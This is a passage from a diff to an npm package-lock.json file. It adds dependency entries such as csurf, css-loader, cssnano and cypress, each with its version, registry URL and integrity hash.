+ "node_modules/csrf": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/csrf/-/csrf-3.1.0.tgz", + "integrity": "sha512-uTqEnCvWRk042asU6JtapDTcJeeailFy4ydOQS28bj1hcLnYRiqi8SsD2jS412AY1I/4qdOwWZun774iqywf9w==", + "dependencies": { + "rndm": "1.2.0", + "tsscmp": "1.0.6", + "uid-safe": "2.1.5" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/css-blank-pseudo": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/css-blank-pseudo/-/css-blank-pseudo-5.0.2.tgz", + "integrity": "sha512-aCU4AZ7uEcVSUzagTlA9pHciz7aWPKA/YzrEkpdSopJ2pvhIxiQ5sYeMz1/KByxlIo4XBdvMNJAVKMg/GRnhfw==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.10" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-declaration-sorter": { + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/css-declaration-sorter/-/css-declaration-sorter-6.4.1.tgz", + "integrity": 
"sha512-rtdthzxKuyq6IzqX6jEcIzQF/YqccluefyCYheovBOLhFT/drQA9zj/UbRAa9J7C0o6EG6u3E6g+vKkay7/k3g==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >=14" + }, + "peerDependencies": { + "postcss": "^8.0.9" + } + }, + "node_modules/css-functions-list": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/css-functions-list/-/css-functions-list-3.2.2.tgz", + "integrity": "sha512-c+N0v6wbKVxTu5gOBBFkr9BEdBWaqqjQeiJ8QvSRIJOf+UxlJh930m8e6/WNeODIK0mYLFkoONrnj16i2EcvfQ==", + "dev": true, + "peer": true, + "engines": { + "node": ">=12 || >=16" + } + }, + "node_modules/css-has-pseudo": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/css-has-pseudo/-/css-has-pseudo-5.0.2.tgz", + "integrity": "sha512-q+U+4QdwwB7T9VEW/LyO6CFrLAeLqOykC5mDqJXc7aKZAhDbq7BvGT13VGJe+IwBfdN2o3Xdw2kJ5IxwV1Sc9Q==", + "dev": true, + "dependencies": { + "@csstools/selector-specificity": "^2.0.1", + "postcss-selector-parser": "^6.0.10", + "postcss-value-parser": "^4.2.0" + }, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-loader": { + "version": "6.8.1", + "resolved": "https://registry.npmjs.org/css-loader/-/css-loader-6.8.1.tgz", + "integrity": "sha512-xDAXtEVGlD0gJ07iclwWVkLoZOpEvAWaSyf6W18S2pOC//K8+qUDIx8IIT3D+HjnmkJPQeesOPv5aiUaJsCM2g==", + "dev": true, + "dependencies": { + "icss-utils": "^5.1.0", + "postcss": "^8.4.21", + "postcss-modules-extract-imports": "^3.0.0", + "postcss-modules-local-by-default": "^4.0.3", + "postcss-modules-scope": "^3.0.0", + "postcss-modules-values": "^4.0.0", + "postcss-value-parser": "^4.2.0", + "semver": "^7.3.8" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + } + }, + "node_modules/css-loader/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-extract-imports": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-extract-imports/-/postcss-modules-extract-imports-3.0.0.tgz", + "integrity": "sha512-bdHleFnP3kZ4NYDhuGlVK+CMrQ/pqUm8bx/oGL93K6gVwiclvX5x0n76fYMKuIGKzlABOy13zsvqjb0f92TEXw==", + "dev": true, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-scope": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-scope/-/postcss-modules-scope-3.0.0.tgz", + "integrity": "sha512-hncihwFA2yPath8oZ15PZqvWGkWf+XUfQgUGamS4LqoP1anQLOsOJw0vr7J7IwLpoY9fatA2qiGUGmuZL0Iqlg==", + "dev": true, + "dependencies": { + "postcss-selector-parser": "^6.0.4" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/postcss-modules-values": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/postcss-modules-values/-/postcss-modules-values-4.0.0.tgz", + "integrity": "sha512-RDxHkAiEGI78gS2ofyvCsu7iycRv7oqw5xMWn9iMoR0N/7mf9D50ecQqUo5BZ9Zh2vH4bCUR/ktCqbB9m8vJjQ==", 
+ "dev": true, + "dependencies": { + "icss-utils": "^5.0.0" + }, + "engines": { + "node": "^10 || ^12 || >= 14" + }, + "peerDependencies": { + "postcss": "^8.1.0" + } + }, + "node_modules/css-loader/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/css-loader/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/css-mediaquery": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/css-mediaquery/-/css-mediaquery-0.1.2.tgz", + "integrity": "sha512-COtn4EROW5dBGlE/4PiKnh6rZpAPxDeFLaEEwt4i10jpDMFt2EhQGS79QmmrO+iKCHv0PU/HrOWEhijFd1x99Q==" + }, + "node_modules/css-minimizer-webpack-plugin": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/css-minimizer-webpack-plugin/-/css-minimizer-webpack-plugin-5.0.1.tgz", + "integrity": "sha512-3caImjKFQkS+ws1TGcFn0V1HyDJFq1Euy589JlD6/3rV2kj+w7r5G9WDMgSHvpvXHNZ2calVypZWuEDQd9wfLg==", + "dev": true, + "dependencies": { + "@jridgewell/trace-mapping": "^0.3.18", + "cssnano": "^6.0.1", + "jest-worker": "^29.4.3", + "postcss": "^8.4.24", + "schema-utils": "^4.0.1", + "serialize-javascript": "^6.0.1" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.0.0" + }, + "peerDependenciesMeta": { + "@parcel/css": { + "optional": true + }, + "@swc/css": { + "optional": true + }, + "clean-css": { + "optional": true + }, + "csso": { + "optional": true + }, + "esbuild": { + "optional": true + }, + "lightningcss": { + "optional": true + } + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/jest-worker": { + "version": "29.5.0", + "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.5.0.tgz", + "integrity": "sha512-NcrQnevGoSp4b5kg+akIpthoAFHxPBcb5P6mYPY0fUNT+sSvmtu6jlkEle3anczUKIKEbMxFimk9oTP/tpIPgA==", + "dev": true, + "dependencies": { + "@types/node": "*", + "jest-util": "^29.5.0", + "merge-stream": "^2.0.0", + "supports-color": "^8.0.0" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + 
"node_modules/css-minimizer-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/css-minimizer-webpack-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + } + }, + "node_modules/css-prefers-color-scheme": { + "version": "8.0.2", + "resolved": "https://registry.npmjs.org/css-prefers-color-scheme/-/css-prefers-color-scheme-8.0.2.tgz", + "integrity": "sha512-OvFghizHJ45x7nsJJUSYLyQNTzsCU8yWjxAc/nhPQg1pbs18LMoET8N3kOweFDPy0JV0OSXN2iqRFhPBHYOeMA==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + "peerDependencies": { + "postcss": "^8.4" + } + }, + "node_modules/css-select": { + "version": "4.2.1", + "resolved": "https://registry.npmjs.org/css-select/-/css-select-4.2.1.tgz", + "integrity": "sha512-/aUslKhzkTNCQUB2qTX84lVmfia9NyjP3WpDGtj/WxhwBzWBYUV3DgUpurHTme8UTPcPlAD1DJ+b0nN/t50zDQ==", + "dev": true, + "dependencies": { + "boolbase": "^1.0.0", + "css-what": "^5.1.0", + "domhandler": "^4.3.0", + "domutils": "^2.8.0", + "nth-check": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/css-tree": { + "version": "2.3.1", + "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.3.1.tgz", + "integrity": "sha512-6Fv1DV/TYw//QF5IzQdqsNDjx/wc8TrMBZsqjL9eW01tWb7R7k/mq+/VXfJCl7SoD5emsJop9cOByJZfs8hYIw==", + "dev": true, + "dependencies": { + "mdn-data": "2.0.30", + "source-map-js": "^1.0.1" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0" + } + }, + "node_modules/css-what": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/css-what/-/css-what-5.1.0.tgz", + "integrity": "sha512-arSMRWIIFY0hV8pIxZMEfmMI47Wj3R/aWpZDDxWYCPEiOMv6tfOrnpDtgxBYPEQD4V0Y/958+1TdC3iWTFcUPw==", + "dev": true, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/css.escape": { + "version": "1.5.1", + "resolved": "https://registry.npmjs.org/css.escape/-/css.escape-1.5.1.tgz", + "integrity": "sha512-YUifsXXuknHlUsmlgyY0PKzgPOr7/FjCePfHNt0jxm83wHZi44VDMQ7/fGNkjY3/jV1MC+1CmZbaHzugyeRtpg==", + "dev": true + }, + "node_modules/cssdb": { + "version": "7.9.0", + "resolved": "https://registry.npmjs.org/cssdb/-/cssdb-7.9.0.tgz", + "integrity": "sha512-WPMT9seTQq6fPAa1yN4zjgZZeoTriSN2LqW9C+otjar12DQIWA4LuSfFrvFJiKp4oD0xIk1vumDLw8K9ur4NBw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/csstools" + }, + { + "type": "github", + "url": "https://github.com/sponsors/csstools" + } + ] + }, + "node_modules/cssesc": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/cssesc/-/cssesc-3.0.0.tgz", + "integrity": 
"sha512-/Tb/JcjK111nNScGob5MNtsntNM1aCNUDipB/TkwZFhyDrrE47SOx/18wF2bbjgc3ZzCSKW1T5nt5EbFoAz/Vg==", + "dev": true, + "bin": { + "cssesc": "bin/cssesc" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/cssnano": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/cssnano/-/cssnano-6.0.1.tgz", + "integrity": "sha512-fVO1JdJ0LSdIGJq68eIxOqFpIJrZqXUsBt8fkrBcztCQqAjQD51OhZp7tc0ImcbwXD4k7ny84QTV90nZhmqbkg==", + "dev": true, + "dependencies": { + "cssnano-preset-default": "^6.0.1", + "lilconfig": "^2.1.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/cssnano" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/cssnano-preset-default": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/cssnano-preset-default/-/cssnano-preset-default-6.0.1.tgz", + "integrity": "sha512-7VzyFZ5zEB1+l1nToKyrRkuaJIx0zi/1npjvZfbBwbtNTzhLtlvYraK/7/uqmX2Wb2aQtd983uuGw79jAjLSuQ==", + "dev": true, + "dependencies": { + "css-declaration-sorter": "^6.3.1", + "cssnano-utils": "^4.0.0", + "postcss-calc": "^9.0.0", + "postcss-colormin": "^6.0.0", + "postcss-convert-values": "^6.0.0", + "postcss-discard-comments": "^6.0.0", + "postcss-discard-duplicates": "^6.0.0", + "postcss-discard-empty": "^6.0.0", + "postcss-discard-overridden": "^6.0.0", + "postcss-merge-longhand": "^6.0.0", + "postcss-merge-rules": "^6.0.1", + "postcss-minify-font-values": "^6.0.0", + "postcss-minify-gradients": "^6.0.0", + "postcss-minify-params": "^6.0.0", + "postcss-minify-selectors": "^6.0.0", + "postcss-normalize-charset": "^6.0.0", + "postcss-normalize-display-values": "^6.0.0", + "postcss-normalize-positions": "^6.0.0", + "postcss-normalize-repeat-style": "^6.0.0", + "postcss-normalize-string": "^6.0.0", + "postcss-normalize-timing-functions": "^6.0.0", + "postcss-normalize-unicode": "^6.0.0", + "postcss-normalize-url": "^6.0.0", + "postcss-normalize-whitespace": "^6.0.0", + "postcss-ordered-values": "^6.0.0", + "postcss-reduce-initial": "^6.0.0", + "postcss-reduce-transforms": "^6.0.0", + "postcss-svgo": "^6.0.0", + "postcss-unique-selectors": "^6.0.0" + }, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/cssnano-utils": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/cssnano-utils/-/cssnano-utils-4.0.0.tgz", + "integrity": "sha512-Z39TLP+1E0KUcd7LGyF4qMfu8ZufI0rDzhdyAMsa/8UyNUU8wpS0fhdBxbQbv32r64ea00h4878gommRVg2BHw==", + "dev": true, + "engines": { + "node": "^14 || ^16 || >=18.0" + }, + "peerDependencies": { + "postcss": "^8.2.15" + } + }, + "node_modules/csso": { + "version": "5.0.5", + "resolved": "https://registry.npmjs.org/csso/-/csso-5.0.5.tgz", + "integrity": "sha512-0LrrStPOdJj+SPCCrGhzryycLjwcgUSHBtxNA8aIDxf0GLsRh1cKYhB00Gd1lDOS4yGH69+SNn13+TWbVHETFQ==", + "dev": true, + "dependencies": { + "css-tree": "~2.2.0" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/csso/node_modules/css-tree": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/css-tree/-/css-tree-2.2.1.tgz", + "integrity": "sha512-OA0mILzGc1kCOCSJerOeqDxDQ4HOh+G8NbOJFOTgOCzpw7fCBubk0fEyxp8AgOL/jvLgYA/uV0cMbe43ElF1JA==", + "dev": true, + "dependencies": { + "mdn-data": "2.0.28", + "source-map-js": "^1.0.1" + }, + "engines": { + "node": "^10 || ^12.20.0 || ^14.13.0 || >=15.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/csso/node_modules/mdn-data": { 
+ "version": "2.0.28", + "resolved": "https://registry.npmjs.org/mdn-data/-/mdn-data-2.0.28.tgz", + "integrity": "sha512-aylIc7Z9y4yzHYAJNuESG3hfhC+0Ibp/MAMiaOZgNv4pmEdFyfZhhhny4MNiAfWdBQ1RQ2mfDWmM1x8SvGyp8g==", + "dev": true + }, + "node_modules/cssom": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/cssom/-/cssom-0.5.0.tgz", + "integrity": "sha512-iKuQcq+NdHqlAcwUY0o/HL69XQrUaQdMjmStJ8JFmUaiiQErlhrmuigkg/CU4E2J0IyUKUrMAgl36TvN67MqTw==", + "dev": true + }, + "node_modules/cssstyle": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/cssstyle/-/cssstyle-2.3.0.tgz", + "integrity": "sha512-AZL67abkUzIuvcHqk7c09cezpGNcxUxU4Ioi/05xHk4DQeTkWmGYftIE6ctU6AEt+Gn4n1lDStOtj7FKycP71A==", + "dev": true, + "dependencies": { + "cssom": "~0.3.6" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cssstyle/node_modules/cssom": { + "version": "0.3.8", + "resolved": "https://registry.npmjs.org/cssom/-/cssom-0.3.8.tgz", + "integrity": "sha512-b0tGHbfegbhPJpxpiBPU2sCkigAqtM9O121le6bbOlgyV+NyGyCmVfJ6QW9eRjz8CpNfWEOYBIMIGRYkLwsIYg==", + "dev": true + }, + "node_modules/csstype": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/csstype/-/csstype-3.1.2.tgz", + "integrity": "sha512-I7K1Uu0MBPzaFKg4nI5Q7Vs2t+3gWWW648spaF+Rg7pI9ds18Ugn+lvg4SHczUdKlHI5LWBXyqfS8+DufyBsgQ==" + }, + "node_modules/csurf": { + "version": "1.11.0", + "resolved": "https://registry.npmjs.org/csurf/-/csurf-1.11.0.tgz", + "integrity": "sha512-UCtehyEExKTxgiu8UHdGvHj4tnpE/Qctue03Giq5gPgMQ9cg/ciod5blZQ5a4uCEenNQjxyGuzygLdKUmee/bQ==", + "dependencies": { + "cookie": "0.4.0", + "cookie-signature": "1.0.6", + "csrf": "3.1.0", + "http-errors": "~1.7.3" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/csurf/node_modules/cookie": { + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.0.tgz", + "integrity": "sha512-+Hp8fLp57wnUSt0tY0tHEXh4voZRDnoIrZPqlo3DPiI4y9lwg/jqx+1Om94/W6ZaPDOUbnjOt/99w66zk+l1Xg==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/csurf/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/csurf/node_modules/http-errors": { + "version": "1.7.3", + "resolved": "https://registry.npmjs.org/http-errors/-/http-errors-1.7.3.tgz", + "integrity": "sha512-ZTTX0MWrsQ2ZAhA1cejAwDLycFsd7I7nVtnkT3Ol0aqodaKW+0CTZDQ1uBv5whptCnc8e8HeRRJxRs0kmm/Qfw==", + "dependencies": { + "depd": "~1.1.2", + "inherits": "2.0.4", + "setprototypeof": "1.1.1", + "statuses": ">= 1.5.0 < 2", + "toidentifier": "1.0.0" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/csurf/node_modules/setprototypeof": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/setprototypeof/-/setprototypeof-1.1.1.tgz", + "integrity": "sha512-JvdAWfbXeIGaZ9cILp38HntZSFSo3mWg6xGcJJsd+d4aRMOqauag1C63dJfDw7OaMYwEbHMOxEZ1lqVRYP2OAw==" + }, + "node_modules/csurf/node_modules/toidentifier": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.0.tgz", + "integrity": "sha512-yaOH/Pk/VEhBWWTlhI+qXxDFXlejDGcQipMlyxda9nthulaxLZUNcUqFxokp0vcYnvteJln5FNQDRrxj3YcbVw==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/csv": { + "version": "5.5.3", + "resolved": "https://registry.npmjs.org/csv/-/csv-5.5.3.tgz", + "integrity": "sha512-QTaY0XjjhTQOdguARF0lGKm5/mEq9PD9/VhZZegHDIBq2tQwgNpHc3dneD4mGo2iJs+fTKv5Bp0fZ+BRuY3Z0g==", + "dependencies": { + 
"csv-generate": "^3.4.3", + "csv-parse": "^4.16.3", + "csv-stringify": "^5.6.5", + "stream-transform": "^2.1.3" + }, + "engines": { + "node": ">= 0.1.90" + } + }, + "node_modules/csv-generate": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/csv-generate/-/csv-generate-3.4.3.tgz", + "integrity": "sha512-w/T+rqR0vwvHqWs/1ZyMDWtHHSJaN06klRqJXBEpDJaM/+dZkso0OKh1VcuuYvK3XM53KysVNq8Ko/epCK8wOw==" + }, + "node_modules/csv-parse": { + "version": "4.16.3", + "resolved": "https://registry.npmjs.org/csv-parse/-/csv-parse-4.16.3.tgz", + "integrity": "sha512-cO1I/zmz4w2dcKHVvpCr7JVRu8/FymG5OEpmvsZYlccYolPBLoVGKUHgNoc4ZGkFeFlWGEDmMyBM+TTqRdW/wg==" + }, + "node_modules/csv-stringify": { + "version": "5.6.5", + "resolved": "https://registry.npmjs.org/csv-stringify/-/csv-stringify-5.6.5.tgz", + "integrity": "sha512-PjiQ659aQ+fUTQqSrd1XEDnOr52jh30RBurfzkscaE2tPaFsDH5wOAHJiw8XAHphRknCwMUE9KRayc4K/NbO8A==" + }, + "node_modules/cypress": { + "version": "13.13.2", + "resolved": "https://registry.npmjs.org/cypress/-/cypress-13.13.2.tgz", + "integrity": "sha512-PvJQU33933NvS1StfzEb8/mu2kMy4dABwCF+yd5Bi7Qly1HOVf+Bufrygee/tlmty/6j5lX+KIi8j9Q3JUMbhA==", + "dev": true, + "hasInstallScript": true, + "dependencies": { + "@cypress/request": "^3.0.1", + "@cypress/xvfb": "^1.2.4", + "@types/sinonjs__fake-timers": "8.1.1", + "@types/sizzle": "^2.3.2", + "arch": "^2.2.0", + "blob-util": "^2.0.2", + "bluebird": "^3.7.2", + "buffer": "^5.7.1", + "cachedir": "^2.3.0", + "chalk": "^4.1.0", + "check-more-types": "^2.24.0", + "cli-cursor": "^3.1.0", + "cli-table3": "~0.6.1", + "commander": "^6.2.1", + "common-tags": "^1.8.0", + "dayjs": "^1.10.4", + "debug": "^4.3.4", + "enquirer": "^2.3.6", + "eventemitter2": "6.4.7", + "execa": "4.1.0", + "executable": "^4.1.1", + "extract-zip": "2.0.1", + "figures": "^3.2.0", + "fs-extra": "^9.1.0", + "getos": "^3.2.1", + "is-ci": "^3.0.1", + "is-installed-globally": "~0.4.0", + "lazy-ass": "^1.6.0", + "listr2": "^3.8.3", + "lodash": "^4.17.21", + "log-symbols": "^4.0.0", + "minimist": "^1.2.8", + "ospath": "^1.2.2", + "pretty-bytes": "^5.6.0", + "process": "^0.11.10", + "proxy-from-env": "1.0.0", + "request-progress": "^3.0.0", + "semver": "^7.5.3", + "supports-color": "^8.1.1", + "tmp": "~0.2.3", + "untildify": "^4.0.0", + "yauzl": "^2.10.0" + }, + "bin": { + "cypress": "bin/cypress" + }, + "engines": { + "node": "^16.0.0 || ^18.0.0 || >=20.0.0" + } + }, + "node_modules/cypress-plugin-tab": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/cypress-plugin-tab/-/cypress-plugin-tab-1.0.5.tgz", + "integrity": "sha512-QtTJcifOVwwbeMP3hsOzQOKf3EqKsLyjtg9ZAGlYDntrCRXrsQhe4ZQGIthRMRLKpnP6/tTk6G0gJ2sZUfRliQ==", + "dev": true, + "dependencies": { + "ally.js": "^1.4.1" + } + }, + "node_modules/cypress/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/cypress/node_modules/buffer": { + "version": "5.7.1", + "resolved": "https://registry.npmjs.org/buffer/-/buffer-5.7.1.tgz", + "integrity": "sha512-EHcyIPBQ4BSGlvjB16k5KgAJ27CIsHY/2JBmCRReo48y9rQ3MaUzWX3KVlBa4U7MyX02HdVj0K7C3WaB3ju7FQ==", + "dev": true, + "funding": [ + { + "type": "github", + "url": 
"https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "base64-js": "^1.3.1", + "ieee754": "^1.1.13" + } + }, + "node_modules/cypress/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/cypress/node_modules/chalk/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cypress/node_modules/commander": { + "version": "6.2.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-6.2.1.tgz", + "integrity": "sha512-U7VdrJFnJgo4xjrHpTzu0yrHPGImdsmD95ZlgYSEajAn2JKzDhDTPG9kBTefmObL2w/ngeZnilk+OV9CG3d7UA==", + "dev": true, + "engines": { + "node": ">= 6" + } + }, + "node_modules/cypress/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + "node_modules/cypress/node_modules/execa": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/execa/-/execa-4.1.0.tgz", + "integrity": "sha512-j5W0//W7f8UxAn8hXVnwG8tLwdiUy4FJLcSupCg6maBYZDpyBvTApK7KyuI4bKj8KOh1r2YH+6ucuYtJv1bTZA==", + "dev": true, + "dependencies": { + "cross-spawn": "^7.0.0", + "get-stream": "^5.0.0", + "human-signals": "^1.1.1", + "is-stream": "^2.0.0", + "merge-stream": "^2.0.0", + "npm-run-path": "^4.0.0", + "onetime": "^5.1.0", + "signal-exit": "^3.0.2", + "strip-final-newline": "^2.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sindresorhus/execa?sponsor=1" + } + }, + "node_modules/cypress/node_modules/fs-extra": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/fs-extra/-/fs-extra-9.1.0.tgz", + "integrity": "sha512-hcg3ZmepS30/7BSFqRvoo3DOMQu7IjqxO5nCDt+zM9XWjb33Wg7ziNT+Qvqbuc3+gWpzO02JubVyk2G4Zvo1OQ==", + "dev": true, + "dependencies": { + "at-least-node": "^1.0.0", + "graceful-fs": "^4.2.0", + "jsonfile": "^6.0.1", + "universalify": "^2.0.0" + }, + "engines": { + "node": 